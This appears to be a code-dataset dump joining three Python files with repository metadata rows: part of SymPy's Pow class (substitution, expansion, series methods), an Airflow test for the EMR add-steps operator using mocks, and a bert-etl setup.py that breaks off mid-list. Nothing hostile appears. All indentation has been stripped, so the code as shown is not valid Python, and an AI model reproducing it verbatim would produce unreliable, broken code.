ct2 = old.exp.as_independent(Symbol, as_Add=False)
ok, pow, remainder_pow = _check(ct1, ct2, old)
if ok:
# issue 5180: (x**(6*y)).subs(x**(3*y),z)->z**2
result = self.func(new, pow)
if remainder_pow is not None:
result = Mul(result, Pow(old.base, remainder_pow))
return result
else: # b**(6*x + a).subs(b**(3*x), y) -> y**2 * b**a
# exp(exp(x) + exp(x**2)).subs(exp(exp(x)), w) -> w * exp(exp(x**2))
oarg = old.exp
new_l = []
o_al = []
ct2 = oarg.as_coeff_mul()
for a in self.exp.args:
newa = a._subs(old, new)
ct1 = newa.as_coeff_mul()
ok, pow, remainder_pow = _check(ct1, ct2, old)
if ok:
new_l.append(new**pow)
if remainder_pow is not None:
o_al.append(remainder_pow)
continue
elif not old.is_commutative and not newa.is_integer:
# If any term in the exponent is non-integer,
# we do not do any substitutions in the noncommutative case
return
o_al.append(newa)
if new_l:
expo = Add(*o_al)
new_l.append(Pow(self.base, expo, evaluate=False) if expo != 1 else self.base)
return Mul(*new_l)
if isinstance(old, exp) and self.exp.is_extended_real and self.base.is_positive:
ct1 = old.args[0].as_independent(Symbol, as_Add=False)
ct2 = (self.exp*log(self.base)).as_independent(
Symbol, as_Add=False)
ok, pow, remainder_pow = _check(ct1, ct2, old)
if ok:
result = self.func(new, pow) # (2**x).subs(exp(x*log(2)), z) -> z
if remainder_pow is not None:
result = Mul(result, Pow(old.base, remainder_pow))
return result
def as_base_exp(self):
"""Return base and exp of self.
If base is 1/Integer, then return Integer, -exp. If this extra
processing is not needed, the base and exp properties will
give the raw arguments
Examples
========
>>> from sympy import Pow, S
>>> p = Pow(S.Half, 2, evaluate=False)
>>> p.as_base_exp()
(2, -2)
>>> p.args
(1/2, 2)
"""
b, e = self.args
if b.is_Rational and b.p == 1 and b.q != 1:
return Integer(b.q), -e
return b, e
def _eval_adjoint(self):
from sympy.functions.elementary.complexes import adjoint
i, p = self.exp.is_integer, self.base.is_positive
if i:
return adjoint(self.base)**self.exp
if p:
return self.base**adjoint(self.exp)
if i is False and p is False:
expanded = expand_complex(self)
if expanded != self:
return adjoint(expanded)
def _eval_conjugate(self):
from sympy.functions.elementary.complexes import conjugate as c
i, p = self.exp.is_integer, self.base.is_positive
if i:
return c(self.base)**self.exp
if p:
return self.base**c(self.exp)
if i is False and p is False:
expanded = expand_complex(self)
if expanded != self:
return c(expanded)
if self.is_extended_real:
return self
def _eval_transpose(self):
from sympy.functions.elementary.complexes import transpose
i, p = self.exp.is_integer, (self.base.is_complex or self.base.is_infinite)
if p:
return self.base**self.exp
if i:
return transpose(self.base)**self.exp
if i is False and p is False:
expanded = expand_complex(self)
if expanded != self:
return transpose(expanded)
def _eval_expand_power_exp(self, **hints):
"""a**(n + m) -> a**n*a**m"""
b = self.base
e = self.exp
if e.is_Add and e.is_commutative:
expr = []
for x in e.args:
expr.append(self.func(self.base, x))
return Mul(*expr)
return self.func(b, e)
def _eval_expand_power_base(self, **hints):
"""(a*b)**n -> a**n * b**n"""
force = hints.get('force', False)
b = self.base
e = self.exp
if not b.is_Mul:
return self
cargs, nc = b.args_cnc(split_1=False)
# expand each term - this is top-level-only
# expansion but we have to watch out for things
# that don't have an _eval_expand method
if nc:
nc = [i._eval_expand_power_base(**hints)
if hasattr(i, '_eval_expand_power_base') else i
for i in nc]
if e.is_Integer:
if e.is_positive:
rv = Mul(*nc*e)
else:
rv = Mul(*[i**-1 for i in nc[::-1]]*-e)
if cargs:
rv *= Mul(*cargs)**e
return rv
if not cargs:
return self.func(Mul(*nc), e, evaluate=False)
nc = [Mul(*nc)]
# sift the commutative bases
other, maybe_real = sift(cargs, lambda x: x.is_extended_real is False,
binary=True)
def pred(x):
if x is S.ImaginaryUnit:
return S.ImaginaryUnit
polar = x.is_polar
if polar:
return True
if polar is None:
return fuzzy_bool(x.is_extended_nonnegative)
sifted = sift(maybe_real, pred)
nonneg = sifted[True]
other += sifted[None]
neg = sifted[False]
imag = sifted[S.ImaginaryUnit]
if imag:
I = S.ImaginaryUnit
i = len(imag) % 4
if i == 0:
pass
elif i == 1:
other.append(I)
elif i == 2:
if neg:
nonn = -neg.pop()
if nonn is not S.One:
nonneg.append(nonn)
else:
neg.append(S.NegativeOne)
else:
if neg:
nonn = -neg.pop()
if nonn is not S.One:
nonneg.append(nonn)
else:
neg.append(S.NegativeOne)
other.append(I)
del imag
# bring out the bases that can be separated from the base
if force or e.is_integer:
# treat all commutatives the same and put nc in other
cargs = nonneg + neg + other
other = nc
else:
# this is just like what is happening automatically, except
# that now we are doing it for an arbitrary exponent for which
# no automatic expansion is done
assert not e.is_Integer
# handle negatives by making them all positive and putting
# the residual -1 in other
if len(neg) > 1:
o = S.One
if not other and neg[0].is_Number:
o *= neg.pop(0)
if len(neg) % 2:
o = -o
for n in neg:
nonneg.append(-n)
if o is not S.One:
other.append(o)
elif neg and other:
if neg[0].is_Number and neg[0] is not S.NegativeOne:
other.append(S.NegativeOne)
nonneg.append(-neg[0])
else:
other.extend(neg)
else:
other.extend(neg)
del neg
cargs = nonneg
other += nc
rv = S.One
if cargs:
rv *= Mul(*[self.func(b, e, evaluate=False) for b in cargs])
if other:
rv *= self.func(Mul(*other), e, evaluate=False)
return rv
def _eval_expand_multinomial(self, **hints):
"""(a + b + ..)**n -> a**n + n*a**(n-1)*b + .., n is nonzero integer"""
base, exp = self.args
result = self
if exp.is_Rational and exp.p > 0 and base.is_Add:
if not exp.is_Integer:
n = Integer(exp.p // exp.q)
if not n:
return result
else:
radical, result = self.func(base, exp - n), []
expanded_base_n = self.func(base, n)
if expanded_base_n.is_Pow:
expanded_base_n = \
expanded_base_n._eval_expand_multinomial()
for term in Add.make_args(expanded_base_n):
result.append(term*radical)
return Add(*result)
n = int(exp)
if base.is_commutative:
order_terms, other_terms = [], []
for b in base.args:
if b.is_Order:
order_terms.append(b)
else:
other_terms.append(b)
if order_terms:
# (f(x) + O(x^n))^m -> f(x)^m + m*f(x)^{m-1} *O(x^n)
f = Add(*other_terms)
o = Add(*order_terms)
if n == 2:
return expand_multinomial(f**n, deep=False) + n*f*o
else:
g = expand_multinomial(f**(n - 1), deep=False)
return expand_mul(f*g, deep=False) + n*g*o
if base.is_number:
# Efficiently expand expressions of the form (a + b*I)**n
# where 'a' and 'b' are real numbers and 'n' is integer.
a, b = base.as_real_imag()
if a.is_Rational and b.is_Rational:
if not a.is_Integer:
if not b.is_Integer:
k = self.func(a.q * b.q, n)
a, b = a.p*b.q, a.q*b.p
else:
k = self.func(a.q, n)
a, b = a.p, a.q*b
elif not b.is_Integer:
k = self.func(b.q, n)
a, b = a*b.q, b.p
else:
k = 1
a, b, c, d = int(a), int(b), 1, 0
while n:
if n & 1:
c, d = a*c - b*d, b*c + a*d
n -= 1
a, b = a*a - b*b, 2*a*b
n //= 2
I = S.ImaginaryUnit
if k == 1:
return c + I*d
else:
return Integer(c)/k + I*d/k
p = other_terms
# (x + y)**3 -> x**3 + 3*x**2*y + 3*x*y**2 + y**3
# in this particular example:
# p = [x,y]; n = 3
# so now it's easy to get the correct result -- we get the
# coefficients first:
from sympy import multinomial_coefficients
from sympy.polys.polyutils import basic_from_dict
expansion_dict = multinomial_coefficients(len(p), n)
# in our example: {(3, 0): 1, (1, 2): 3, (0, 3): 1, (2, 1): 3}
# and now construct the expression.
return basic_from_dict(expansion_dict, *p)
else:
if n == 2:
return Add(*[f*g for f in base.args for g in base.args])
else:
multi = (base**(n - 1))._eval_expand_multinomial()
if multi.is_Add:
return Add(*[f*g for f in base.args
for g in multi.args])
else:
# XXX can this ever happen if base was an Add?
return Add(*[f*multi for f in base.args])
elif (exp.is_Rational and exp.p < 0 and base.is_Add and
abs(exp.p) > exp.q):
return 1 / self.func(base, -exp)._eval_expand_multinomial()
elif exp.is_Add and base.is_Number:
# a + b a b
# n --> n n , where n, a, b are Numbers
coeff, tail = S.One, S.Zero
for term in exp.args:
if term.is_Number:
coeff *= self.func(base, term)
else:
tail += term
return coeff * self.func(base, tail)
else:
return result
def as_real_imag(self, deep=True, **hints):
from sympy import atan2, cos, im, re, sin
from sympy.polys.polytools import poly
if self.exp.is_Integer:
exp = self.exp
re_e, im_e = self.base.as_real_imag(deep=deep)
if not im_e:
return self, S.Zero
a, b = symbols('a b', cls=Dummy)
if exp >= 0:
if re_e.is_Number and im_e.is_Number:
# We can be more efficient in this case
expr = expand_multinomial(self.base**exp)
if expr != self:
return expr.as_real_imag()
expr = poly(
(a + b)**exp) # a = re, b = im; expr = (a + b*I)**exp
else:
mag = re_e**2 + im_e**2
re_e, im_e = re_e/mag, -im_e/mag
if re_e.is_Number and im_e.is_Number:
# We can be more efficient in this case
expr = expand_multinomial((re_e + im_e*S.ImaginaryUnit)**-exp)
if expr != self:
return expr.as_real_imag()
expr = poly((a + b)**-exp)
# Terms with even b powers will be real
r = [i for i in expr.terms() if not i[0][1] % 2]
re_part = Add(*[cc*a**aa*b**bb for (aa, bb), cc in r])
# Terms with odd b powers will be imaginary
r = [i for i in expr.terms() if i[0][1] % 4 == 1]
im_part1 = Add(*[cc*a**aa*b**bb for (aa, bb), cc in r])
r = [i for i in expr.terms() if i[0][1] % 4 == 3]
im_part3 = Add(*[cc*a**aa*b**bb for (aa, bb), cc in r])
return (re_part.subs({a: re_e, b: S.ImaginaryUnit*im_e}),
im_part1.subs({a: re_e, b: im_e}) + im_part3.subs({a: re_e, b: -im_e}))
elif self.exp.is_Rational:
re_e, im_e = self.base.as_real_imag(deep=deep)
if im_e.is_zero and self.exp is S.Half:
if re_e.is_extended_nonnegative:
return self, S.Zero
if re_e.is_extended_nonpositive:
return S.Zero, (-self.base)**self.exp
# XXX: This is not totally correct since for x**(p/q) with
# x being imaginary there are actually q roots, but
# only a single one is returned from here.
r = self.func(self.func(re_e, 2) + self.func(im_e, 2), S.Half)
t = atan2(im_e, re_e)
rp, tp = self.func(r, self.exp), t*self.exp
return (rp*cos(tp), rp*sin(tp))
else:
if deep:
hints['complex'] = False
expanded = self.expand(deep, **hints)
if hints.get('ignore') == expanded:
return None
else:
return (re(expanded), im(expanded))
else:
return (re(self), im(self))
def _eval_derivative(self, s):
from sympy import log
dbase = self.base.diff(s)
dexp = self.exp.diff(s)
return self * (dexp * log(self.base) + dbase * self.exp/self.base)
def _eval_evalf(self, prec):
base, exp = self.as_base_exp()
base = base._evalf(prec)
if not exp.is_Integer:
exp = exp._evalf(prec)
if exp.is_negative and base.is_number and base.is_extended_real is False:
base = base.conjugate() / (base * base.conjugate())._evalf(prec)
exp = -exp
return self.func(base, exp).expand()
return self.func(base, exp)
def _eval_is_polynomial(self, syms):
if self.exp.has(*syms):
return False
if self.base.has(*syms):
return bool(self.base._eval_is_polynomial(syms) and
self.exp.is_Integer and (self.exp >= 0))
else:
return True
def _eval_is_rational(self):
# The evaluation of self.func below can be very expensive in the case
# of integer**integer if the exponent is large. We should try to exit
# before that if possible:
if (self.exp.is_integer and self.base.is_rational
and fuzzy_not(fuzzy_and([self.exp.is_negative, self.base.is_zero]))):
return True
p = self.func(*self.as_base_exp()) # in case it's unevaluated
if not p.is_Pow:
return p.is_rational
b, e = p.as_base_exp()
if e.is_Rational and b.is_Rational:
# we didn't check that e is not an Integer
# because Rational**Integer autosimplifies
return False
if e.is_integer:
if b.is_rational:
if fuzzy_not(b.is_zero) or e.is_nonnegative:
return True
if b == e: # always rational, even for 0**0
return True
elif b.is_irrational:
return e.is_zero
def _eval_is_algebraic(self):
def _is_one(expr):
try:
return (expr - 1).is_zero
except ValueError:
# when the operation is not allowed
return False
if self.base.is_zero or _is_one(self.base):
return True
elif self.exp.is_rational:
if self.base.is_algebraic is False:
return self.exp.is_zero
if self.base.is_zero is False:
if self.exp.is_nonzero:
return self.base.is_algebraic
elif self.base.is_algebraic:
return True
if self.exp.is_positive:
return self.base.is_algebraic
elif self.base.is_algebraic and self.exp.is_algebraic:
if ((fuzzy_not(self.base.is_zero)
and fuzzy_not(_is_one(self.base)))
or self.base.is_integer is False
or self.base.is_irrational):
return self.exp.is_rational
def _eval_is_rational_function(self, syms):
if self.exp.has(*syms):
return False
if self.base.has(*syms):
return self.base._eval_is_rational_function(syms) and \
self.exp.is_Integer
else:
return True
def _eval_is_algebraic_expr(self, syms):
if self.exp.has(*syms):
return False
if self.base.has(*syms):
return self.base._eval_is_algebraic_expr(syms) and \
self.exp.is_Rational
else:
return True
def _eval_rewrite_as_exp(self, base, expo, **kwargs):
from sympy import exp, log, I, arg
if base.is_zero or base.has(exp) or expo.has(exp):
return base**expo
if base.has(Symbol):
# delay evaluation if expo is non symbolic
# (as exp(x*log(5)) automatically reduces to x**5)
return exp(log(base)*expo, evaluate=expo.has(Symbol))
else:
return exp((log(abs(base)) + I*arg(base))*expo)
def as_numer_denom(self):
if not self.is_commutative:
return self, S.One
base, exp = self.as_base_exp()
n, d = base.as_numer_denom()
# this should be the same as ExpBase.as_numer_denom wrt
# exponent handling
neg_exp = exp.is_negative
if not neg_exp and not (-exp).is_negative:
neg_exp = _coeff_isneg(exp)
int_exp = exp.is_integer
# the denominator cannot be separated from the numerator if
# its sign is unknown unless the exponent is an integer, e.g.
# sqrt(a/b) != sqrt(a)/sqrt(b) when a=1 and b=-1. But if the
# denominator is negative the numerator and denominator can
# be negated and the denominator (now positive) separated.
if not (d.is_extended_real or int_exp):
n = base
d = S.One
dnonpos = d.is_nonpositive
if dnonpos:
n, d = -n, -d
elif dnonpos is None and not int_exp:
n = base
d = S.One
if neg_exp:
n, d = d, n
exp = -exp
if exp.is_infinite:
if n is S.One and d is not S.One:
return n, self.func(d, exp)
if n is not S.One and d is S.One:
return self.func(n, exp), d
return self.func(n, exp), self.func(d, exp)
def matches(self, expr, repl_dict={}, old=False):
expr = _sympify(expr)
# special case, pattern = 1 and expr.exp can match to 0
if expr is S.One:
d = repl_dict.copy()
d = self.exp.matches(S.Zero, d)
if d is not None:
return d
# make sure the expression to be matched is an Expr
if not isinstance(expr, Expr):
return None
b, e = expr.as_base_exp()
# special case number
sb, se = self.as_base_exp()
if sb.is_Symbol and se.is_Integer and expr:
if e.is_rational:
return sb.matches(b**(e/se), repl_dict)
return sb.matches(expr**(1/se), repl_dict)
d = repl_dict.copy()
d = self.base.matches(b, d)
if d is None:
return None
d = self.exp.xreplace(d).matches(e, d)
if d is None:
return Expr.matches(self, expr, repl_dict)
return d
def _eval_nseries(self, x, n, logx):
# NOTE! This function is an important part of the gruntz algorithm
# for computing limits. It has to return a generalized power
# series with coefficients in C(log, log(x)). In more detail:
# It has to return an expression
# c_0*x**e_0 + c_1*x**e_1 + ... (finitely many terms)
# where e_i are numbers (not necessarily integers) and c_i are
# expressions involving only numbers, the log function, and log(x).
from sympy import ceiling, collect, exp, log, O, Order, powsimp
b, e = self.args
if e.is_Integer:
if e > 0:
# positive integer powers are easy to expand, e.g.:
# sin(x)**4 = (x - x**3/3 + ...)**4 = ...
return expand_multinomial(self.func(b._eval_nseries(x, n=n,
logx=logx), e), deep=False)
elif e is S.NegativeOne:
# this is also easy to expand using the formula:
# 1/(1 + x) = 1 - x + x**2 - x**3 ...
# so we need to rewrite base to the form "1 + x"
nuse = n
cf = 1
try:
ord = b.as_leading_term(x)
cf = Order(ord, x).getn()
if cf and cf.is_Number:
nuse = n + 2*ceiling(cf)
else:
cf = 1
except NotImplementedError:
pass
b_orig, prefactor = b, O(1, x)
while prefactor.is_Order:
nuse += 1
b = b_orig._eval_nseries(x, n=nuse, logx=logx)
prefactor = b.as_leading_term(x)
# express "rest" as: rest = 1 + k*x**l + ... + O(x**n)
rest = expand_mul((b - prefactor)/prefactor)
if rest.is_Order:
return 1/prefactor + rest/prefactor + O(x**n, x)
k, l = rest.leadterm(x)
if l.is_Rational and l > 0:
pass
elif l.is_number and l > 0:
l = l.evalf()
elif l == 0:
k = k.simplify()
if k == 0:
# if prefactor == w**4 + x**2*w**4 + 2*x*w**4, we need to
# factor the w**4 out using collect:
return 1/collect(prefactor, x)
else:
raise NotImplementedError()
else:
raise NotImplementedError()
if cf < 0:
cf = S.One/abs(cf)
try:
dn = Order(1/prefactor, x).getn()
if dn and dn < 0:
pass
else:
dn = 0
except NotImplementedError:
dn = 0
terms = [1/prefactor]
for m in range(1, ceiling((n - dn + 1)/l*cf)):
new_term = terms[-1]*(-rest)
if new_term.is_Pow:
new_term = new_term._eval_expand_multinomial(
deep=False)
else:
new_term = expand_mul(new_term, deep=False)
terms.append(new_term)
terms.append(O(x**n, x))
return powsimp(Add(*terms), deep=True, combine='exp')
else:
# negative powers are rewritten to the cases above, for
# example:
# sin(x)**(-4) = 1/(sin(x)**4) = ...
# and expand the denominator:
nuse, denominator = n, O(1, x)
while denominator.is_Order:
denominator = (b**(-e))._eval_nseries(x, n=nuse, logx=logx)
nuse += 1
if 1/denominator == self:
return self
# now we have a type 1/f(x), that we know how to expand
return (1/denominator)._eval_nseries(x, n=n, logx=logx)
if e.has(Symbol):
return exp(e*log(b))._eval_nseries(x, n=n, logx=logx)
# see if the base is as simple as possible
bx = b
while bx.is_Pow and bx.exp.is_Rational:
bx = bx.base
if bx == x:
return self
# work for b(x)**e where e is not an Integer and does not contain x
# and hopefully has no other symbols
def e2int(e):
"""return the integer value (if possible) of e and a
flag indicating whether it is bounded or not."""
n = e.limit(x, 0)
infinite = n.is_infinite
if not infinite:
# XXX was int or floor intended? int used to behave like floor
# so int(-Rational(1, 2)) returned -1 rather than int's 0
try:
n = int(n)
except TypeError:
# well, the n is something more complicated (like 1 + log(2))
try:
n = int(n.evalf()) + 1 # XXX why is 1 being added?
except TypeError:
pass # hope that base allows this to be resolved
n = _sympify(n)
return n, infinite
order = O(x**n, x)
ei, infinite = e2int(e)
b0 = b.limit(x, 0)
if infinite and (b0 is S.One or b0.has(Symbol)):
# XXX what order
if b0 is S.One:
resid = (b - 1)
if resid.is_positive:
return S.Infinity
elif resid.is_negative:
return S.Zero
raise ValueError('cannot determine sign of %s' % resid)
return b0**ei
if (b0 is S.Zero or b0.is_infinite):
if infinite is not False:
return b0**e # XXX what order
if not ei.is_number: # if not, how will we proceed?
raise ValueError(
'expecting numerical exponent but got %s' % ei)
nuse = n - ei
if e.is_extended_real and e.is_positive:
lt = b.as_leading_term(x)
# Try to correct nuse (= m) guess from:
# (lt + rest + O(x**m))**e =
# lt**e*(1 + rest/lt + O(x**m)/lt)**e =
# lt**e + ... + O(x**m)*lt**(e - 1) = ... + O(x**n)
try:
cf = Order(lt, x).getn()
nuse = ceiling(n - cf*(e - 1))
except NotImplementedError:
pass
bs = b._eval_nseries(x, n=nuse, logx=logx)
terms = bs.removeO()
if terms.is_Add:
bs = terms
lt = terms.as_leading_term(x)
# bs -> lt + rest -> lt*(1 + (bs/lt - 1))
return ((self.func(lt, e) * self.func((bs/lt).expand(), e).nseries(
x, n=nuse, logx=logx)).expand() + order)
if bs.is_Add:
from sympy import O
# So, bs + O() == terms
c = Dummy('c')
res = []
for arg in bs.args:
if arg.is_Order:
arg = c*arg.expr
res.append(arg)
bs = Add(*res)
rv = (bs**e).series(x).subs(c, O(1, x))
rv += order
return rv
rv = bs**e
if terms != bs:
rv += order
return rv
# either b0 is bounded but neither 1 nor 0 or e is infinite
# b -> b0 + (b - b0) -> b0 * (1 + (b/b0 - 1))
o2 = order*(b0**-e)
z = (b/b0 - 1)
o = O(z, x)
if o is S.Zero or o2 is S.Zero:
infinite = True
else:
if o.expr.is_number:
e2 = log(o2.expr*x)/log(x)
else:
e2 = log(o2.expr)/log(o.expr)
n, infinite = e2int(e2)
if infinite:
# requested accuracy gives infinite series,
# order is probably non-polynomial e.g. O(exp(-1/x), x).
r = 1 + z
else:
l = []
g = None
for i in range(n + 2):
g = self._taylor_term(i, z, g)
g = g.nseries(x, n=n, logx=logx)
l.append(g)
r = Add(*l)
return expand_mul(r*b0**e) + order
def _eval_as_leading_term(self, x):
from sympy import exp, log
if not self.exp.has(x):
return self.func(self.base.as_leading_term(x), self.exp)
return exp(self.exp * log(self.base)).as_leading_term(x)
@cacheit
def _taylor_term(self, n, x, *previous_terms): # of (1 + x)**e
from sympy import binomial
return binomial(self.exp, n) * self.func(x, n)
def _sage_(self):
return self.args[0]._sage_()**self.args[1]._sage_()
def as_content_primitive(self, radical=False, clear=True):
"""Return the tuple (R, self/R) where R is the positive Rational
extracted from self.
Examples
========
>>> from sympy import sqrt
>>> sqrt(4 + 4*sqrt(2)).as_content_primitive()
(2, sqrt(1 + sqrt(2)))
>>> sqrt(3 + 3*sqrt(2)).as_content_primitive()
(1, sqrt(3)*sqrt(1 + sqrt(2)))
>>> from sympy import expand_power_base, powsimp, Mul
>>> from sympy.abc import x, y
>>> ((2*x + 2)**2).as_content_primitive()
(4, (x + 1)**2)
>>> (4**((1 + y)/2)).as_content_primitive()
(2, 4**(y/2))
>>> (3**((1 + y)/2)).as_content_primitive()
(1, 3**((y + 1)/2))
>>> (3**((5 + y)/2)).as_content_primitive()
(9, 3**((y + 1)/2))
>>> eq = 3**(2 + 2*x)
>>> powsimp(eq) == eq
True
>>> eq.as_content_primitive()
(9, 3**(2*x))
>>> powsimp(Mul(*_))
3**(2*x + 2)
>>> eq = (2 + 2*x)**y
>>> s = expand_power_base(eq); s.is_Mul, s
(False, (2*x + 2)**y)
>>> eq.as_content_primitive()
(1, (2*(x + 1))**y)
>>> s = expand_power_base(_[1]); s.is_Mul, s
(True, 2**y*(x + 1)**y)
See docstring of Expr.as_content_primitive for more examples.
"""
b, e = self.as_base_exp()
b = _keep_coeff(*b.as_content_primitive(radical=radical, clear=clear))
ce, pe = e.as_content_primitive(radical=radical, clear=clear)
if b.is_Rational:
#e
#= ce*pe
#= ce*(h + t)
#= ce*h + ce*t
#=> self
#= b**(ce*h)*b**(ce*t)
#= b**(cehp/cehq)*b**(ce*t)
#= b**(iceh + r/cehq)*b**(ce*t)
#= b**(iceh)*b**(r/cehq)*b**(ce*t)
#= b**(iceh)*b**(ce*t + r/cehq)
h, t = pe.as_coeff_Add()
if h.is_Rational:
ceh = ce*h
c = self.func(b, ceh)
r = S.Zero
if not c.is_Rational:
iceh, r = divmod(ceh.p, ceh.q)
c = self.func(b, iceh)
return c, self.func(b, _keep_coeff(ce, t + r/ce/ceh.q))
e = _keep_coeff(ce, pe)
# b**e = (h*t)**e = h**e*t**e = c*m*t**e
if e.is_Rational and b.is_Mul:
h, t = b.as_content_primitive(radical=radical, clear=clear) # h is positive
c, m = self.func(h, e).as_coeff_Mul() # so c is positive
m, me = m.as_base_exp()
if m is S.One or me == e: # probably always true
# return the following, not return c, m*Pow(t, e)
# which would change Pow into Mul; we let sympy
# decide what to do by using the unevaluated Mul, e.g
# should it stay as sqrt(2 + 2*sqrt(5)) or become
# sqrt(2)*sqrt(1 + sqrt(5))
return c, self.func(_keep_coeff(m, t), e)
return S.One, self.func(b, e)
def is_constant(self, *wrt, **flags):
expr = self
if flags.get('simplify', True):
expr = expr.simplify()
b, e = expr.as_base_exp()
bz = b.equals(0)
if bz: # recalculate with assumptions in case it's unevaluated
new = b**e
if new != expr:
return new.is_constant()
econ = e.is_constant(*wrt)
bcon = b.is_constant(*wrt)
if bcon:
if econ:
return True
bz = b.equals(0)
if bz is False:
return False
elif bcon is None:
return None
return e.equals(0)
def _eval_difference_delta(self, n, step):
b, e = self.args
if e.has(n) and not b.has(n):
new_e = e.subs(n, n + step)
return (b**(new_e - e) - 1) * self
from .add import Add
from .numbers import Integer
from .mul import Mul, _keep_coeff
from .symbol import Symbol, Dummy, symbols
| 37.397953
| 98
| 0.467872
|
e5ac9fe129b72c2c8d5c60b00b11734b8a533d67
| 3,277
|
py
|
Python
|
tests/contrib/operators/test_emr_add_steps_operator.py
|
RyanMagnusson/incubator-airflow
|
ad81412fba2e8510442db73d9c905cac5eed8ebd
|
[
"Apache-2.0"
] | 2
|
2018-03-07T12:25:05.000Z
|
2018-03-19T01:00:10.000Z
|
tests/contrib/operators/test_emr_add_steps_operator.py
|
RyanMagnusson/incubator-airflow
|
ad81412fba2e8510442db73d9c905cac5eed8ebd
|
[
"Apache-2.0"
] | null | null | null |
tests/contrib/operators/test_emr_add_steps_operator.py
|
RyanMagnusson/incubator-airflow
|
ad81412fba2e8510442db73d9c905cac5eed8ebd
|
[
"Apache-2.0"
] | 1
|
2020-07-14T09:45:54.000Z
|
2020-07-14T09:45:54.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from datetime import timedelta
from mock import MagicMock, patch
from airflow import DAG, configuration
from airflow.contrib.operators.emr_add_steps_operator import EmrAddStepsOperator
from airflow.models import TaskInstance
from airflow.utils import timezone
DEFAULT_DATE = timezone.datetime(2017, 1, 1)
ADD_STEPS_SUCCESS_RETURN = {
'ResponseMetadata': {
'HTTPStatusCode': 200
},
'StepIds': ['s-2LH3R5GW3A53T']
}
class TestEmrAddStepsOperator(unittest.TestCase):
# When
_config = [{
'Name': 'test_step',
'ActionOnFailure': 'CONTINUE',
'HadoopJarStep': {
'Jar': 'command-runner.jar',
'Args': [
'/usr/lib/spark/bin/run-example',
'{{ macros.ds_add(ds, -1) }}',
'{{ ds }}'
]
}
}]
def setUp(self):
configuration.load_test_config()
args = {
'owner': 'airflow',
'start_date': DEFAULT_DATE
}
# Mock out the emr_client (moto has incorrect response)
self.emr_client_mock = MagicMock()
self.operator = EmrAddStepsOperator(
task_id='test_task',
job_flow_id='j-8989898989',
aws_conn_id='aws_default',
steps=self._config,
dag=DAG('test_dag_id', default_args=args)
)
def test_init(self):
self.assertEqual(self.operator.job_flow_id, 'j-8989898989')
self.assertEqual(self.operator.aws_conn_id, 'aws_default')
def test_render_template(self):
ti = TaskInstance(self.operator, DEFAULT_DATE)
ti.render_templates()
expected_args = [{
'Name': 'test_step',
'ActionOnFailure': 'CONTINUE',
'HadoopJarStep': {
'Jar': 'command-runner.jar',
'Args': [
'/usr/lib/spark/bin/run-example',
(DEFAULT_DATE - timedelta(days=1)).strftime("%Y-%m-%d"),
DEFAULT_DATE.strftime("%Y-%m-%d"),
]
}
}]
self.assertListEqual(self.operator.steps, expected_args)
def test_execute_returns_step_id(self):
self.emr_client_mock.add_job_flow_steps.return_value = ADD_STEPS_SUCCESS_RETURN
# Mock out the emr_client creator
emr_session_mock = MagicMock()
emr_session_mock.client.return_value = self.emr_client_mock
self.boto3_session_mock = MagicMock(return_value=emr_session_mock)
with patch('boto3.session.Session', self.boto3_session_mock):
self.assertEqual(self.operator.execute(None), ['s-2LH3R5GW3A53T'])
if __name__ == '__main__':
unittest.main()
| 31.509615
| 87
| 0.627708
|
ce0fe024420e5205c65baac06451da8fc0b538f3
| 2,777
|
py
|
Python
|
setup.py
|
jbcurtin/bert
|
956e1647b590ac13b679579231b085895778d807
|
[
"MIT"
] | 2
|
2019-08-28T21:39:50.000Z
|
2019-12-17T10:53:28.000Z
|
setup.py
|
jbcurtin/bert
|
956e1647b590ac13b679579231b085895778d807
|
[
"MIT"
] | 19
|
2019-09-04T21:19:12.000Z
|
2021-03-28T22:10:32.000Z
|
setup.py
|
jbcurtin/bert
|
956e1647b590ac13b679579231b085895778d807
|
[
"MIT"
] | 1
|
2019-08-28T21:39:53.000Z
|
2019-08-28T21:39:53.000Z
|
import os
import sys
from setuptools import find_packages, setup
# Hacky, but functional
file_dir: str = os.path.dirname(__file__)
bert_path: str = os.path.join(file_dir, 'bert')
if not os.path.exists(bert_path):
raise NotImplementedError
sys.path.append(file_dir)
import bert
# Always reference code-origin
# https://github.com/django/django/blob/master/setup.py#L7
CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 6)
if CURRENT_PYTHON < REQUIRED_PYTHON:
sys.stderr.write("""
==========================
Unsupported Python version
==========================
This version of bert-etl requires Python {}.{}, but you're trying to
install it on Python {}.{}.
This may be because you are using a version of pip that doesn't
understand the python_requires classifier. Make sure you
have pip >= 9.0 and setuptools >= 24.2, then try again:
$ python -m pip install --upgrade pip setuptools
$ python -m pip install bert
This will install the latest version of bert-etl which works on your
version of Python
""".format(*(REQUIRED_PYTHON + CURRENT_PYTHON)))
sys.exit(1)
EXCLUDE_FROM_PACKAGES = ['bert.bin']
version = '0.4.77'
description = 'A microframework for simple ETL solutions'
def read(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as f:
return f.read()
setup(
name='bert-etl',
version=version,
python_requires='>={}.{}'.format(*REQUIRED_PYTHON),
url='https://github.com/jbcurtin/bert',
author="Joseph Curtin <42@jbcurtin.io",
author_email='bert@jbcurtin.io',
description=description,
long_description=read('README.md'),
license='MIT',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=[],
install_requires=[
'redis==3.3.5',
'marshmallow==2.19.5',
'boto3==1.9.251',
'pyyaml==5.1.2',
'GitPython==3.1.1',
],
entry_points={
'console_scripts': [
'bert-example.py = bert.example.factory:run_from_cli',
'bert-deploy.py = bert.deploy.factory:run_from_cli',
'bert-runner.py = bert.runner.factory:run_from_cli',
'bert-secrets.py = bert.secrets.factory:run_from_cli',
'bert-roles.py = bert.roles.factory:run_from_cli',
'bert-debug.py = bert.debug.factory:run_from_cli',
]
},
zip_safe=False,
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
